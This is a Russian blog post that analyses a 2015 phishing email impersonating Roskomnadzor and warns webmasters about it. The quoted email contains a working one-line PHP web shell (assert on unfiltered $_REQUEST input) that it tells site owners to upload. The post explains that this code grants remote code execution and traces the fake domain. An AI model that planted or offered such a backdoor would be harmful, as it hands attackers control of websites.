Архив метки: мошенники

Мошенники под видом Роскомнадзора

Сегодня на электронный ящик одного совместного проекта получил письмо якобы от Роскомнадзора с адресом отправителя zapret-info@roskomnadzor.org. С непреодолимым чувством любопытства и удивления открыл ноутбук, чтобы внимательно прочесть письмо и понять, чем же проект стал интересен регулятору.

Ведь все это происходит под шум громких заголовков о блокировке таких сайтов как Википедия. Как оказалось Роскомнадзор здесь не причем.

Вот содержание этого письма.

>>>
от: Роскомнадзор <zapret-info@roskomnadzor.org>
ответить: zapret-info@roskomnadzor.org
Кому: mailbox@example.com
дата: 27 августа 2015 г., 7:21
тема: Уведомление о внесении сайта example.ru в реестр организаторов распространения информации в сети «Интернет»
отправлено через: sendgrid.net
подписан: sendgrid.me

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени example.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон «Об информации, информационных технологиях и о защите информации» и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт example.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени example.ru, Вам необходимо:

  1. Cоздать в корневой директории Вашего сайта папку reestr
  2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php

/*Подтверждение доменного имени example.ru*/

assert(stripslashes($_REQUEST[roskomnadzor]));

?>

*В < ?php необходимо убрать пробел между < и ?php

Путь до файла на Вашем сайте должен получиться следующий: example.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени example.ru, следую инструкции указанной выше, то Ваш сайт example.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

——————-

С уважением,

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
<<<

В общем-то, к таким письмам следует относится внимательно. Перво наперво, что это за код PHP, который требуют разместить, а-то заблокируют. Любому сведущему в программировании понятно, что этого однозначно делать нельзя. Что же происходит при исполнении данного кода? Разберемся.

$_REQUEST — массив в PHP содержащий в себе массивы $_GET, $_POST и $_COOKIE. Т.е. неотфильтрованные данные извне. Далее вызывается функция stripslashes, которая удаляет экранирование кода, на случай, если массив $_REQUEST все же экранировался. В конце концов все, что передано в массив $_REQUEST (это может быть любой код PHP), отправляется в функцию assert(), которая работает идентично eval(), т. е. код исполняется.

Такие письма сразу отправляем в спам, но пойдем и разберемся дальше.

Вторым делом, посмотрим внимательнее на адрес отправителя. Что мы видим @roskomnadzor.org. Как минимум странно, что у гос. органа почтовый домен в зоне ORG. Проверим реальный домен Роскомнадзора, и действительно, это совершенно другой адрес — rkn.gov.ru. И отправлено письмо, через один из сервисов email-рассылок.

Перейдем на сам домен roskomnadzor.org и увидим переадресацию на реальный сайт rkn.gov.ru. Переадресация происходит с кодом 302 Moved Temporarily (временно перемещен). Отправители письма продумали и потрудились представить домен как один из доменов Роскомнадзора. Смущает лишь переадресация с кодом 302 вместо 301 как это делается для синонимов или зеркал сайтов.

Заглянем в WHOIS домена roskomnadzor.org (см. результат запроса ниже). Результат говорит сам за себя, приведу лишь самые интересные строки.

Domain Name:ROSKOMNADZOR.ORG
Domain ID: D177149039-LROR
Creation Date: 2015-08-19T23:12:27Z
Updated Date: 2015-08-19T23:41:38Z
Registry Expiry Date: 2016-08-19T23:12:27Z
Sponsoring Registrar:TLD Registrar Solutions Ltd. (R2011-LROR)
Sponsoring Registrar IANA ID: 1564
Registrant ID:INTE12jyrqple3k6
Registrant Name:Domain Admin
Registrant Organization:Whois Privacy Corp.
Registrant Street: Ocean Centre, Montagu Foreshore
Registrant Street: East Bay Street
Registrant City:Nassau
Registrant State/Province:New Providence
Registrant Postal Code:0000
Registrant Country:BS
Registrant Phone:+44.7546458118
Registrant Email:roskomnadzor.org-owner@customers.whoisprivacycorp.com
Name Server:NS-CANADA.TOPDNS.COM
Name Server:NS-USA.TOPDNS.COM
Name Server:NS-UK.TOPDNS.COM

Мы имеем дело с мошенниками, которые хотят под видом Роскомнадзора получить доступ к сайту в расчете на недальновидность и неосмотрительность веб-мастера.

Проверим, где располагается сервер обслуживающий домен. Для этого посмотрим в базу IP адресов Ru-Center. Нам сообщают, что IP-адрес 46.166.189.98 из Нидерландов, что подтверждается несколькими иностранными сервисами (используем именно иностранные, т.к. российские зачастую пользуются одним и тем же сервисом от Ru-Centeripgeobase.ru). Провайдер Nforce Entertainment B.v. в городе Roosendaal.

Дальше смотреть нет смыла и, естественно, необходимо уведомить гос. орган и коллег по цеху о такой рассылке.

В качестве заключения, хотелось бы пожелать вам, не попадаться на уловки мошенников. Будьте бдительны.